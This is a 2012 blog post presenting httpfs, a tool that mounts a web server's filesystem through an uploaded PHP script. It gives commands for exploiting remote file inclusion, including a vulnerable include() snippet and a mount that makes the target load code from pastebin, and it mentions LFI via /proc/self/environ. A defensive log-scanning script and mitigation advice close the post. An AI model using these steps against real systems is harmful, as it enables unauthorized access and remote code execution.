Penetration testing with httpfs: RFI
2012-07-27 13:59:27 » C, filesystem, fuse, hacking, lfi, linux, networking, pentesting, php, rfi, security, Weevely
As every system administrator knows, mounting remote filesystems with protocols like sshfs or smbfs saves time and simplifies interaction with remote machines. This convenience is usually not available with limited remote access, such as when managing a web shell or during a web application penetration test.
If you are familiar with those situations, httpfs can help you mount a remote filesystem locally, relying on a script, such as a PHP file, installed on the target web server. This FUSE filesystem, written by Andrea Cardaci and me, is the next indispensable tool in your toolkit.
Basic usage
Just generate the server-side script (PHP in this case), upload it to the target machine and mount the remote location locally. Let's go through the individual steps:
- Download the httpfs archive or clone the source code from GitHub.
- Compile and install it as described in the README file.
- Generate PHP script:
    $ httpfs generate php > httpfs.php
- Upload the generated script to an accessible location inside the document root of the target web server. The next paragraphs show some penetration testing techniques to run the httpfs PHP code by exploiting file inclusion vulnerabilities.
- Mount remote location locally:
    $ httpfs mount http://target.com/httpfs.php /tmp/httpfs/
- If you don't have enough privileges to access the system root '/', append a remote folder as the last parameter to mount it as the base directory:
    $ httpfs mount http://target.com/httpfs.php /tmp/httpfs/ /home/john
- Browse your pretty awesome new mountpoint:
    $ cd /tmp/httpfs/
    $ ls
    bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
    boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
Exploiting file inclusion
Remote file inclusion is a common vulnerability that forces a vulnerable PHP web application to execute malicious PHP code. A typical exploitable PHP script contains:
    <?php
    include($_GET['page']);
    ?>
Let's exploit RFI to execute the httpfs server-side PHP code and mount the remote filesystem.
- Verify the RFI vulnerability by checking whether include() can open third-party web resources:
    $ curl http://target.com/fi.php?page="http://www.google.com"
By default the PHP option "allow_url_fopen" is off, which disables opening HTTP and FTP URLs; in those cases try the LFI attack described at the bottom.
- Generate the httpfs server-side script as described in the previous section.
- Upload the generated PHP script to an HTTP-reachable site, such as http://pastebin.com or something faster.
- Run httpfs, using as the URL the location that loads the generated httpfs script:
    $ mkdir /tmp/httpfs/
    $ httpfs mount http://target.com/fi.php?page="http://pastebin.com/raw.php?i=XFYwGCK0" /tmp/httpfs/
- Browse the remote filesystem through the local mount point:
    $ cd /tmp/httpfs/
    $ ls
    bin cdrom etc initrd.img lib lost+found mnt proc run selinux sys usr vmlinuz
    boot dev home initrd.img.old lib64 media opt root sbin srv tmp var vmlinuz.old
When an application is prone to a file inclusion vulnerability but doesn't allow opening remote HTTP or FTP URLs, it is still possible to inject our malicious code with techniques like /proc/self/environ or log poisoning.
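From the defender's side, the requests described above leave a recognizable trace in the web server's access log: the include parameter carries a remote URL, or a path such as /proc/self/environ. The following Python script is an added example, not part of httpfs or the original post; it assumes the combined log format, and the log lines, addresses and the paste.example host are constructed. It also assumes that a mounted filesystem shows up as many requests repeating the same include target, which is why it counts hits per client.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Combined access log format: client address, method, request target, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+)[^"]*" (\d{3})')
# RFI: the parameter value is itself a remote URL.
REMOTE = re.compile(r'^\s*(?:https?|ftps?)://', re.I)
# LFI: traversal, /proc/self/environ, or a server log used as include target.
LOCAL = re.compile(r'\.\./|/proc/self/environ|(?:access|error)[._]log', re.I)

def classify(value):
    """Return 'rfi', 'lfi' or None for one decoded query parameter value."""
    if REMOTE.search(value):
        return 'rfi'
    return 'lfi' if LOCAL.search(value) else None

def scan(lines):
    """Count suspicious requests per (client, path, parameter, kind)."""
    hits = Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        path, _, query = target.partition('?')
        # parse_qsl percent-decodes, so encoded ../ and %2F are normalised first.
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                hits[(client, path, name, kind)] += 1
    return hits

# Constructed sample lines (documentation addresses, placeholder paste id).
SAMPLE_LOG = '''\
203.0.113.5 - - [27/Jul/2012:14:00:01 +0200] "GET /fi.php?page=http://www.google.com HTTP/1.1" 200 5120
203.0.113.5 - - [27/Jul/2012:14:02:10 +0200] "POST /fi.php?page=http://paste.example/raw.php?i=PLACEHOLDER HTTP/1.1" 200 88
203.0.113.5 - - [27/Jul/2012:14:02:11 +0200] "POST /fi.php?page=http://paste.example/raw.php?i=PLACEHOLDER HTTP/1.1" 200 412
203.0.113.5 - - [27/Jul/2012:14:02:11 +0200] "POST /fi.php?page=http://paste.example/raw.php?i=PLACEHOLDER HTTP/1.1" 200 97
198.51.100.7 - - [27/Jul/2012:14:05:40 +0200] "GET /fi.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 731
192.0.2.44 - - [27/Jul/2012:14:06:02 +0200] "GET /fi.php?page=about.php HTTP/1.1" 200 2048
192.0.2.44 - - [27/Jul/2012:14:06:09 +0200] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 900
'''

if __name__ == '__main__':
    for (client, path, name, kind), n in scan(SAMPLE_LOG.splitlines()).most_common():
        print(f'{kind.upper()} x{n}: {client} -> {path}?{name}=')
```

On the PHP side, include() of a remote URL additionally requires the "allow_url_include" option, so keeping it off and mapping the page parameter to a fixed allowlist of local files closes both the remote and the local inclusion path.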
Httpfs will soon be included in Weevely as an automatic installation module; meanwhile, enjoy this complete standalone version.
